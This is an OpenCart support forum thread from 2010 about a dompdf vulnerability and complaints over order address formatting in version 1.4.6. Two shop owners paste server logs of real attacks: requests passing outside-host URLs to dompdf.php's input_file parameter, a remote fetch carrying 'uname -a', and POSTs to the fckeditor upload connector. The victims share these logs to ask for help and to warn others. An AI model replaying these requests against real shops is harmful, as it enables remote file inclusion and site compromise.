Post by fido-x » Thu Apr 08, 2010 11:48 am

Qphoria wrote:You wrote it, I read it
Yeah, but you obviously didn't understand it.

Image
Modules for OpenCart 2.3.0.2
Homepage Module [Free - since OpenCart 0.7.7]
Multistore Extensions
Store Manager Multi-Vendor/Multi-Store management tool

If you're not living on the edge ... you're taking up too much space!


User avatar
Expert Member

Posts

Joined
Sat Jun 28, 2008 1:09 am
Location - Tasmania, Australia

Post by Qphoria » Thu Apr 08, 2010 12:01 pm

Or you obviously wrote it wrong?

Image


User avatar
Administrator

Posts

Joined
Tue Jul 22, 2008 3:02 am

Post by i2Paq » Thu Apr 08, 2010 12:34 pm

fido-x wrote:In OpenCart, this just means deleting "system/helper/dompdf/dompdf.php". Since my own contributions in this area (PDF viewer for OC versions 1.3.2 and 1.3.4) already use the class directly, they will continue to work with the "dompdf.php" file removed.
Qphoria wrote:Just delete the damn folder
Guys!

You are not talking about the same thing so that is where the confusion starts!

The folder needs to be there, only the "dompdf.php" file needs te be removed.

Norman in 't Veldt
Moderator OpenCart Forums

_________________ READ and Search BEFORE POSTING _________________

Our FREE search: Find your answer FAST!.

[How to] BTW + Verzend + betaal setup.


User avatar
Global Moderator

Posts

Joined
Mon Nov 09, 2009 7:00 pm
Location - Winkel - The Netherlands

Post by Qphoria » Thu Apr 08, 2010 7:32 pm

Is there a new version that fixes this?
I went to the dompdf site and it looks like nobody has any conversations about it.
http://www.digitaljunkies.ca/dompdf/
http://code.google.com/p/dompdf/issues/list

Actually in google when I search "dompdf vulnerability" I find only articles from Feb 2009 and there was a one line fix for it

I see there is dompdf 6.0 beta out but not sure how useful that is at this point

Image


User avatar
Administrator

Posts

Joined
Tue Jul 22, 2008 3:02 am

Post by 12oclocker » Sat Apr 10, 2010 1:13 am

First let me say I love open cart, and want to see it succeed beyond the other carts out there, but I downgraded back to 1.4.0 for a few reasons, please think of these comments as constructive recommendations....

I copied my database, and upgraded from 1.4.0 to 1.4.6,
but then downgraded back to 1.4.0 for a few big reasons...

1) I can no longer copy addresses into Endicia's shipping program for quick and easy shipping (main reason)
This is the biggest reason I had to downgrade, It would increase my shipping time by at least 10x everyday. One copy and paste for every order is much much better than 9 copy and paste actions for every order. When shipping a lot of orders this ready starts to slow you down big time.
2) Cannot edit invoices to make changes on errored ordered, such has price changes.
3) Cannot change or void an invoice and have the cost deduct from the sales statistics.

for a single store user I don't see any benefit in the 1.4.6 upgrade
I may actually spend some time writing these features into version 1.4.0, since everything else on that version is excellent.



...Address format is no longer shipping friendly ...
Joe Smith
200 Cherry Lane
New York, NY, 13110

...it's now a line by line thing, no longer compatible with any copy/paste shipping programs....
First Name: Joe
Last Name: Smith
Company:
Address 1: 200 Cherry Lane
City: New York
Post Code: 13110
Region / State: New York
Region / State Code: NY
Country: United States

Active Member

Posts

Joined
Fri Feb 19, 2010 10:50 am

Post by i2Paq » Sat Apr 10, 2010 1:50 am

12oclocker wrote: ...Address format is no longer shipping friendly ...
Joe Smith
200 Cherry Lane
New York, NY, 13110

...it's now a line by line thing, no longer compatible with any copy/paste shipping programs....
First Name: Joe
Last Name: Smith
Company:
Address 1: 200 Cherry Lane
City: New York
Post Code: 13110
Region / State: New York
Region / State Code: NY
Country: United States
This you can set yourself in the BO of 1.4.6:

Configuration -> Settings -> Country's -> Country

Norman in 't Veldt
Moderator OpenCart Forums

_________________ READ and Search BEFORE POSTING _________________

Our FREE search: Find your answer FAST!.

[How to] BTW + Verzend + betaal setup.


User avatar
Global Moderator

Posts

Joined
Mon Nov 09, 2009 7:00 pm
Location - Winkel - The Netherlands

Post by Johnathan » Sat Apr 10, 2010 4:33 am

12oclocker wrote:...Address format is no longer shipping friendly ...
Joe Smith
200 Cherry Lane
New York, NY, 13110

...it's now a line by line thing, no longer compatible with any copy/paste shipping programs....
First Name: Joe
Last Name: Smith
Company:
Address 1: 200 Cherry Lane
City: New York
Post Code: 13110
Region / State: New York
Region / State Code: NY
Country: United States
I agree with 12oclocker that the 1.4.0 way of addressing is much better than the 1.4.6 way.

Image Image Image Image Image


User avatar
Administrator

Posts

Joined
Fri Dec 18, 2009 3:08 am


Post by i2Paq » Sat Apr 10, 2010 5:11 am

Johnathan wrote:I agree with 12oclocker that the 1.4.0 way of addressing is much better than the 1.4.6 way.
I believe they where the same...

Norman in 't Veldt
Moderator OpenCart Forums

_________________ READ and Search BEFORE POSTING _________________

Our FREE search: Find your answer FAST!.

[How to] BTW + Verzend + betaal setup.


User avatar
Global Moderator

Posts

Joined
Mon Nov 09, 2009 7:00 pm
Location - Winkel - The Netherlands

Post by Johnathan » Sat Apr 10, 2010 11:36 am

12oclocker was talking about the way addresses are displayed in Orders. In 1.4.6 they are separated by lines (i.e. in different <td> tags) instead of all together like in 1.4.0 (i.e. in one <td> tag). Since they're in different <td> tags, you can't copy and paste the whole address at once. It all boils down to the new design of the Order page, which seems not as user-friendly.

Image Image Image Image Image


User avatar
Administrator

Posts

Joined
Fri Dec 18, 2009 3:08 am


Post by Qphoria » Sat Apr 10, 2010 8:38 pm

12oclocker wrote: 1) I can no longer copy addresses into Endicia's shipping program for quick and easy shipping (main reason)
This is the biggest reason I had to downgrade, It would increase my shipping time by at least 10x everyday. One copy and paste for every order is much much better than 9 copy and paste actions for every order. When shipping a lot of orders this ready starts to slow you down big time.
I know where you are coming from for this. I used to use my own script that would send to usps by just copying the whole address. You should still be able to copy/paste the old way if you click the "Invoice" button at the top of the order page. Have you tried that?

Image


User avatar
Administrator

Posts

Joined
Tue Jul 22, 2008 3:02 am

Post by Johnathan » Sat Apr 10, 2010 10:54 pm

Qphoria wrote:I know where you are coming from for this. I used to use my own script that would send to usps by just copying the whole address. You should still be able to copy/paste the old way if you click the "Invoice" button at the top of the order page. Have you tried that?
Ah, good idea. I've tested it, that works fine.

Image Image Image Image Image


User avatar
Administrator

Posts

Joined
Fri Dec 18, 2009 3:08 am


Post by 12oclocker » Sun Apr 11, 2010 7:53 am

I know where you are coming from for this. I used to use my own script that would send to usps by just copying the whole address. You should still be able to copy/paste the old way if you click the "Invoice" button at the top of the order page. Have you tried that?
That's a solution, I'll probably stick with 1.4.0 for now, the big feature I was hoping for was the ability to edit orders, order editing capability is a critical must for any real business, I was hoping 1.4.6 was going to have it, I am going to write some though, so once I write it I'll post it up, That a huge priority for me right now, I just don't have any time to do it at the moment, I definitely need a way to edit and void orders so that it reflects correctly on the statistics, very important for end of year tax time, if I don't have accurate records I'll get nailed, and I really don't want to keep paper records, so the statistic thing is a cool feature, I just need to code a way to make it accurate, because as it stands, I cannot alter an order in the system once it's placed, and I get at least 1 altered order per week, so this becomes a problem, I wish there was 32 hours in a day. I could get a lot more done. All in all though OpenCart is better than everything else I have tried, very cool, It will be a total solution once order editing is introduced.

Active Member

Posts

Joined
Fri Feb 19, 2010 10:50 am

Post by Qphoria » Sun Apr 11, 2010 8:18 am

planned for 1.4.8

Image


User avatar
Administrator

Posts

Joined
Tue Jul 22, 2008 3:02 am

Post by 12oclocker » Thu Apr 15, 2010 11:29 pm

awesome.....


I did get his with the dompdf library vulnerability today!! it is real, I fixed it though. everything is ok now.

Active Member

Posts

Joined
Fri Feb 19, 2010 10:50 am

Post by Geo » Fri Apr 16, 2010 12:28 pm

Get hit by hackers. Injection of iframe in footer.tpl file. It is not true that only dom.php is vulnerable: see here

Code: Select all

[23-Mar-2010 03:05:17] PHP Warning:  file_get_contents(http://66.181.240.100/~ches/go/195753.txt?x=uname -a) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found
 in /home/user/public_html/store/system/helper/dompdf/include/dompdf.cls.php on line 261
[23-Mar-2010 03:06:08] PHP Fatal error:  Uncaught exception 'DOMPDF_Exception' with message 'Requested HTML document contains no data.' in /home/user/public_html/store/system/helper/dompdf/include/frame_tree.cls.php:135
Stack trace:
#0 /home/user/public_html/store/system/helper/dompdf/include/dompdf.cls.php(293): Frame_Tree->build_tree()
#1 /home/user/public_html/store/system/helper/dompdf/include/dompdf.cls.php(377): DOMPDF->_process_html()
#2 /home/user/public_html/store/system/helper/dompdf/dompdf.php(275): DOMPDF->render()
#3 {main}
  thrown in /home/user/public_html/store/system/helper/dompdf/include/frame_tree.cls.php on line 135

So for admins: make sure dompdf folder is deleted, but DO NOT delete system/helper/image.php ;)
Also: Did you guys have a problems with fckeditor:

Code: Select all

94.228.220.68 - - [11/Apr/2010:12:13:15 +0300] "GET /store/system/helper/dompdf/dompdf.php?input_file=http://musorka.cn.zp.ua/cfg/conf.txt HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"
94.228.220.68 - - [11/Apr/2010:12:13:13+0300] "POST /store/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 404 276 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"
How can it be secured? After uploading a site can it be deleted?

Geo
Newbie

Posts

Joined
Fri Apr 09, 2010 4:42 pm


Post by Qphoria » Fri Apr 16, 2010 7:25 pm

Thanks for the info.

Image


User avatar
Administrator

Posts

Joined
Tue Jul 22, 2008 3:02 am

Post by 12oclocker » Fri Apr 16, 2010 9:05 pm

yeah I deleted Everything inside of the dompdf folder, I didn't want to take a chance ;D

Active Member

Posts

Joined
Fri Feb 19, 2010 10:50 am

Post by dbellinzani » Sat Apr 17, 2010 8:30 pm

Ciao,
if someone wants to study the IP ... here is my log ...

94.228.220.68 - - [11/Apr/2010:12:40:53 +0200] "POST /admin/view/javascript/fckeditor/editor/filemanager/connectors/php/upload.php HTTP/1.1" 200 309 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"
94.228.220.68 - - [11/Apr/2010:12:40:55 +0200] "GET /system/helper/dompdf/dompdf.php?input_file=http://musorka.cn.zp.ua/cfg/conf.txt HTTP/1.1" 200 33 "-" "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51"

Daniele

Newbie

Posts

Joined
Wed Oct 07, 2009 11:18 pm

Post by Geo » Mon Apr 19, 2010 8:01 am

Youre welcome Qphoria. Thank you for announcement for other users.

Geo
Newbie

Posts

Joined
Fri Apr 09, 2010 4:42 pm

Who is online

Users browsing this forum: No registered users and 105 guests